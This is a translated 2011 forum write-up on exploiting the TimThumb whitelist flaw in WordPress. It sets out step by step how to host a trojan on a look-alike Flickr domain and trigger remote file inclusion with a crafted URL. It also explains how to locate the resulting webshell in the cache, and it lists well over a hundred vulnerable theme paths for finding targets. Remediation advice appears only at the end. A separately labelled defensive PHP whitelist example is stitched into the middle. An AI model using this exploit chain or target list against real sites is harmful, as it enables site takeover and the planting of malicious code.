
Exploiting the WordPress thumbnail script timthumb.php vulnerability

Published: 2011-12-02 09:20  Source: t00ls  Author: lc198465
Abstract: timthumb.php is a very popular WordPress thumbnail script. Several well-known foreign themes, such as Woothemes, use this plugin. The vulnerability stems from a default whitelist in timthumb that contains well-known image-sharing sites such as Flickr and Picasa. An attacker can exploit a flaw in how timthumb validates hosts against this whitelist...

timthumb.php is a very popular WordPress thumbnail script. Several well-known foreign themes, such as Woothemes, use this plugin.

The vulnerability stems from the fact that timthumb defines, by default, a whitelist containing well-known image-sharing sites such as Flickr and Picasa. By exploiting a flaw in how timthumb validates hosts against this whitelist, an attacker can get a domain such as "http://flickr.com.domain.com" accepted and thereby upload and execute PHP code. In other words, if your theme uses timthumb.php to generate thumbnails dynamically, an attacker can use this vulnerability to upload arbitrary malicious programs into the image cache directory defined in your timthumb.php. The relevant code is:

  // external domains that are allowed to be displayed on your website
  $allowedSites = array (
          'flickr.com',
          'picasa.com',
          'blogger.com',
          'wordpress.com',
          'img.youtube.com',
  );

Affected versions: 1.14 - 1.32
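As an added illustration (this is not TimThumb's own code and not part of the original article): the whitelist above checked two ways in PHP. isAllowedLoose reconstructs the weak behaviour the article describes, a substring test that a host such as flickr.com.domain.com passes simply because it contains a whitelisted name; isAllowedStrict is a hardened replacement that accepts only an exact whitelisted host or a genuine subdomain of it. The function names, the "loose" reconstruction and the sample URLs are assumptions made for this example, not the exact upstream logic.

```php
<?php
// Added example, not TimThumb's own code: the article's whitelist checked two ways.

$allowedSites = array(
    'flickr.com',
    'picasa.com',
    'blogger.com',
    'wordpress.com',
    'img.youtube.com',
);

// Loose check (hypothetical reconstruction of the weak behaviour described in the
// article): passes as soon as a whitelisted name appears ANYWHERE in the host, so
// "flickr.com.domain.com" and "notflickr.com" are both accepted.
function isAllowedLoose($url, array $allowedSites)
{
    $host = strtolower((string) parse_url($url, PHP_URL_HOST));
    foreach ($allowedSites as $site) {
        if (strpos($host, strtolower($site)) !== false) {
            return true;
        }
    }
    return false;
}

// Strict check (hardened replacement): the host must equal a whitelisted name
// exactly, or end in ".<name>", so only real subdomains such as
// "farm1.static.flickr.com" are accepted and look-alike hosts are rejected.
function isAllowedStrict($url, array $allowedSites)
{
    $parts = parse_url($url);
    if ($parts === false || !isset($parts['host'])) {
        return false;
    }
    // Only plain http(s) fetches are allowed as external sources.
    $scheme = isset($parts['scheme']) ? strtolower($parts['scheme']) : '';
    if ($scheme !== 'http' && $scheme !== 'https') {
        return false;
    }
    $host = strtolower(rtrim($parts['host'], '.'));
    foreach ($allowedSites as $site) {
        $site = strtolower($site);
        if ($host === $site) {
            return true;
        }
        $suffix = '.' . $site;
        if (strlen($host) > strlen($suffix)
            && substr($host, -strlen($suffix)) === $suffix) {
            return true;
        }
    }
    return false;
}

// Constructed sample sources: a legitimate Flickr image host, the look-alike
// third-level domain pattern the article describes, and a prefix look-alike.
$samples = array(
    'http://farm1.static.flickr.com/1/photo.jpg',
    'http://flickr.com.domain.com/anything.php',
    'http://flickr.com/photo.jpg',
    'http://notflickr.com/photo.jpg',
);

foreach ($samples as $src) {
    printf("%-45s loose=%s strict=%s\n",
        $src,
        isAllowedLoose($src, $allowedSites) ? 'allow' : 'deny',
        isAllowedStrict($src, $allowedSites) ? 'allow' : 'deny');
}
```

Run with `php whitelist_check.php`: the loose check allows all four sources, while the strict check allows only the first and third. The design point is that a hostname whitelist must match on label boundaries (exact host or a dot-delimited suffix) rather than on substrings, and that the scheme must be restricted as well, since the goal of the whitelist is to limit where the script will fetch from.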

Although this plugin vulnerability was published some time ago, many newcomers like me still do not know how to exploit it, so I am writing up what I have worked out on my own.
1. Preparation
Prerequisites:
1) WordPress has a vulnerable timthumb.php installed, for example via a theme:
http://target-site-domain/wp-content/themes/canvas/timthumb.php

http://target-site-domain/wp-content/themes/canvas/thumb.php

2) Set up a website on a third-level domain, at
http://flickr.com.domain.com

http://picasa.com.domain.com
and upload your own trojan there.

3) This is a condition I overlooked at first: the hosting space must not parse PHP; otherwise the trojan is executed, and the file delivered to the target site is not the source file but the parsed output.

2. Finding target sites

Few sites in China have this plugin installed, but a great many WordPress installs abroad do, for example:
8q/scripts/timthumb.php
aerial/lib/timthumb.php
aesthete/timthumb.php
albizia/includes/timthumb.php
amphion-lite/script/timthumb.php
aqua-blue/includes/timthumb.php
aranovo/scripts/timthumb.php
arras/library/timthumb.php
arras-theme/library/timthumb.php
arthemix-bronze/scripts/timthumb.php
arthemix-green/scripts/timthumb.php
artisan/includes/timthumb.php
a-simple-business-theme/scripts/timthumb.php
a-supercms/timthumb.php
aureola/scripts/timthumb.php
aurorae/timthumb.php
autofashion/thumb.php
automotive-blog-theme/Quick Cash Auto/timthumb.php
automotive-blog-theme/timthumb.php
bikes/thumb.php
black_eve/timthumb.php
blex/scripts/timthumb.php
bloggnorge-a1/scripts/timthumb.php
blogified/timthumb.php
blue-corporate-hyve-theme/timthumb.php
bluemag/library/timthumb.php
blue-news/scripts/timthumb.php
bombax/includes/timthumb.php
breakingnewz/timthumb.php
brightsky/scripts/timthumb.php
brochure-melbourne/includes/timthumb.php
business-turnkey/assets/js/timthumb.php
calotropis/includes/timthumb.php
coffee-lite/thumb.php
comet/scripts/timthumb.php
conceditor-wp-strict/scripts/timthumb.php
constructor/layouts/thumb.php
constructor/libs/timthumb.php
constructor/timthumb.php
coverht-wp/scripts/timthumb.php
cover-wp/scripts/timthumb.php
dark-dream-media/timthumb.php
deep-blue/timthumb.php
delicate/thumb.php
diamond-ray/thumb.php
dieselclothings/thumb.php
digitalblue/thumb.php
dimenzion/timthumb.php
epione/script/timthumb.php
evr-green/scripts/timthumb.php
famous/megaframe/megapanel/inc/upload.php
famous/timthumb.php
fashion-style/thumb.php
featuring/timthumb.php
fliphoto/timthumb.php
flix/timthumb.php
fordreporter/scripts/thumb.php
freeside/thumb.php
fresh-blu/scripts/timthumb.php
go-green/modules/timthumb.php
granite-lite/scripts/timthumb.php
greydove/timthumb.php
greyzed/functions/efrog/lib/timthumb.php
gunungkidul/thumb.php
heartspotting-beta/thumb.php
heli-1-wordpress-theme/images/timthumb.php
ideatheme/timthumb.php
impressio/timthumb/timthumb.php
introvert/thumb.php
inuit-types/thumb.php
isotherm-news/thumb.php
iwana-v10/timthumb.php
jambo/thumb.php
jcblackone/thumb.php
kratalistic/thumb.php
life-style-free/thumb.php
likehacker/timthumb.php
litepress/scripts/timthumb.php
loganpress-premium-theme-1/thumb.php
magazine-basic/thumb.php
magup/timthumb.php
make-money-online-theme-1/scripts/timthumb.php
make-money-online-theme-2/scripts/timthumb.php
make-money-online-theme-3/scripts/timthumb.php
make-money-online-theme-4/scripts/timthumb.php
make-money-online-theme/scripts/timthumb.php
meintest/layouts/thumb.php
mobilephonecomparision/thumb.php
moi-magazine/timthumb.php
my-heli/images/timthumb.php
mymag/timthumb.php
mystique/extensions/auto-thumb/timthumb.php
nash/theme-assets/php/timthumb.php
neofresh/timthumb.php
neo_wdl/includes/extensions/thumb.php
new-green-natural-living-ngnl/scripts/timthumb.php
newspress/thumb.php
pearlie/scripts/timthumb.php
pico/scripts/timthumb.php
postage-sydney/includes/timthumb.php
premium-violet/thumb.php
probluezine/timthumb.php
pronto/cjl/pronto/uploadify/check.php
pronto/cjl/pronto/uploadify/uploadify.php
r755/thumb.php
regal/timthumb.php
shaan/timthumb.php
shadow-block/thumb.php
shadow/timthumb.php
simple-but-great/timthumb.php
simplenews_premium/scripts/timthumb.php
simple-red-theme/timthumb.php
simple-tabloid/thumb.php
simplewhite/timthumb.php
slidette/timThumb/timthumb.php
snowblind_colbert/thumb.php
snowblind/thumb.php
spotlight/timthumb.php
squeezepage/timthumb.php
standout/thumb.php
suffusion/timthumb.php
swift/includes/thumb.php
swift/includes/timthumb.php
swift/timthumb.php
techozoic-fluid/options/thumb.php
the_dark_os/tools/timthumb.php
themetiger-fashion/thumb.php
theory/thumb.php
the-theme/core/libs/thumbnails/thumb.php
thrillingtheme/thumb.php
tm-theme/js/timthumb.php
totallyred/scripts/timthumb.php
travelogue-theme/scripts/timthumb.php
true-blue-theme/timthumb.php
ttnews-theme/timthumb.php
twittplus/scripts/timthumb.php
typographywp/timthumb.php
ugly/timthumb.php
unity/timthumb.php
versitility/timthumb.php
vibefolio-teaser-10/scripts/timthumb.php
vina/thumb.php
whitemag/script/thumb.php
wpapi/thumb.php
wpbus-d4/includes/timthumb.php
wp-creativix/scripts/timthumb.php
wp-newsmagazine/scripts/timthumb.php
wp-perfect/js/timthumb.php
wp-premium-orange/timthumb.php
xiando-one/thumb.php
zcool-like/timthumb.php
zcool-like/uploadify.php

3. Starting the intrusion
Enter the following in the browser address bar:
http://target-site-path/timthumb.php?src=http://http://flickr.com.domain.com/trojan-name.php

Then I can find the file at
http://target-site-path/cache/external_md5-value.php

http://target-site-path/temp/external_md5-value.php

If the timthumb.php version is lower than 2.0, the trojan's address is
http://target-site-path/cache/md5-value.php

Note that the md5 value here is the md5 of http://http://flickr.com.domain.com/trojan-name.php

4. Summary
Although the conditions for exploiting this vulnerability are fairly strict, there are a great many WordPress users abroad and a large number of themes use this plugin, so many sites still carry this security risk.

Remediation:
1) Overwrite the original file with the latest version of timthumb.php;
2) Remove the whitelist;
3) Set server directory permissions.

Tags: WordPress thumbnail vulnerability
